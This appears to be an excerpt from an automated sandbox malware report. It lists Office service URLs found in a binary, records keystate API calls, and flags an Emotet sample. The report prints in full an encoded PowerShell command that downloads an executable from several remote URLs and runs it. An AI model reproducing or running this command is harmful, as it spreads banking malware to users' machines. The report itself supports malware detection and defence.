            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://officeapps.live.com
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://onedrive.live.com
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://onedrive.live.com/embed?
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://powerlift.acompli.net
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://retailer.osi.office.net/appstate/query
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://settings.outlook.com
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://shell.suite.office.com:1443
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://skyapi.live.net/Activity/
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://store.office.cn/addinstemplate
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://store.office.com/addinstemplate
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://store.office.de/addinstemplate
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://tasks.office.com
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://templatelogging.office.com/client/log
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://web.microsoftstream.com/video/
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://wus2-000.contentsync.
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://wus2-000.pagecontentsync.
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
            Source: svchost.exe, 00000012.00000002.1545925673.000001491CDD9000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
            Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.drString found in binary or memory: https://www.odwebp.svc.ms
            Source: Qzso.exe, 00000003.00000002.1293036172.00000000007EA000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
            Source: C:\Users\user\AppData\Local\Temp\Qzso.exeCode function: 3_2_00418A7C GetKeyState,GetKeyState,GetKeyState,GetKeyState,3_2_00418A7C
            Source: C:\Users\user\AppData\Local\Temp\Qzso.exeCode function: 3_2_00416DBB GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,3_2_00416DBB
            Source: C:\Windows\SysWOW64\cfgmgr32\atl110.exeCode function: 4_2_00418A7C GetKeyState,GetKeyState,GetKeyState,GetKeyState,4_2_00418A7C
            Source: C:\Windows\SysWOW64\cfgmgr32\atl110.exeCode function: 4_2_00416DBB GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,4_2_00416DBB

            E-Banking Fraud:

            barindex
            Malicious encrypted Powershell command line foundShow sources
            Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powersheLL -e JABNAGMAdABiAGUAbwBtAD0AJwBQAGYAaQBkADAAYwBnACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMARQBDAGAAVQBgAFIASQB0AFkAcABgAFIATwB0AE8AYABjAGAAbwBsACIAIAA9ACAAJwB0AGwAcwAxADIALAAgAHQAbABzADEAMQAsACAAdABsAHMAJwA7ACQAQwA5AGYANABtAHcAYwAgAD0AIAAnAFEAegBzAG8AJwA7ACQAWQBjADUAZQB2AHkAMwA9ACcAUwB6AHoAdABsAG4ANgAnADsAJABTAG8AagBhADIANQBjAD0AJABlAG4AdgA6AHQAZQBtAHAAKwAnAFwAJwArACQAQwA5AGYANABtAHcAYwArACcALgBlAHgAZQAnADsAJABSAGkAaABsAGMAZwBxAD0AJwBQAF8AYgBhADMAcwA1ACcAOwAkAFYAagBhAGsAbgBpAGQAPQAmACgAJwBuAGUAJwArACcAdwAtACcAKwAnAG8AJwArACcAYgBqAGUAYwB0ACcAKQAgAE4ARQB0AC4AVwBFAGIAYwBsAGkAZQBOAHQAOwAkAFkAeQB5ADcANwA3AHMAPQAnAGgAdAB0AHAAOgAvAC8AcwBlAGUAZABzAGEAZwByAG8ALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBNAFoAOQBRAGQALwAqAGgAdAB0AHAAOgAvAC8AYQByAGkAYgBzAGEAbABpAG4ALgBlAG0AYQB0AGoALgBjAG8AbQAvAHUAcAAvAEUAOQBPAGoAMwB0AFAAYQBDAGsALwAqAGgAdAB0AHAAOgAvAC8AZABhAHcAbwBvAGQALQBlAGwAbQBvAHIAYQB0AGUAbAAuAGUAbQBhAHQAagAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AZQBEAE8AUgBZADMAMQA3AC8AKgBoAHQAdABwADoALwAvAGsAaAB1AGQAbwB0AGgAaQBhAHEAdQBhAGMAaQB0AHkALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAEYATABnAGkAVgBNADgALwAqAGgAdAB0AHAAOgAvAC8AZwBwAHoAagB3ADgALgBuAGUAdAAvAGUAawBqAHMAbgAvAEEAVgA3ADgANQAxADMAMQAvACcALgAiAFMAYABQAGwASQBUACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQAQQBjADMAcABpAG8AcQA9ACcAUQBuAG4ANwByADEAMwAnADsAZgBvAHIAZQBhAGMAaAAoACQARABvAGQAbAB3AGcAagAgAGkAbgAgACQAWQB5AHkANwA3ADcAcwApAHsAdAByAHkAewAkAFYAagBhAGsAbgBpAGQALgAiAEQAYABPAHcAbgBgAGwAYABPAEEAZABGAEkAbABFACIAKAAkAEQAbwBkAGwAdwBnAGoALAAgACQAUwBvAGoAYQAyADUAYwApADsAJABGAHgAMAAzAHIAawA5AD0AJwBRAGkAdQB3AHgAMwBoACcAOwBJAGYAIAAoACgALgAoACcARwBlACcAKwAnAHQALQAnACsAJwBJAHQAZQBtACcAKQAgACQAUwBvAGoAYQAyADUAYwApAC4AIgBMAGUAYABOAGcAVABIACIAIAAtAGcAZQAgADIANAA1ADAAMwApACAAewAmACgAJwBJAG4AdgBvAGsAZQAtAEkAJwArACcAdAAnACsAJwBlAG0AJwApACgAJABTAG8AagBhADIANQBjACkAOwAkAEIAcwBpAHcAcQBsAGsAPQAnAFQAegB6ADUAdQBmADcAJwA7AGIAcgBlAGEAawA7ACQATAA0AGUAdABjAGYAMwA9ACcAWgAzAGEANQA2ADUANgAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABEAGEAcABpAHQAXwA0AD0AJwBSAGEAMQB2AGkAMABkACcA
            Yara detected EmotetShow sources
            Source: Yara matchFile source: 00000003.00000002.1292982021.0000000000700000.00000040.00000001.sdmp, type: MEMORY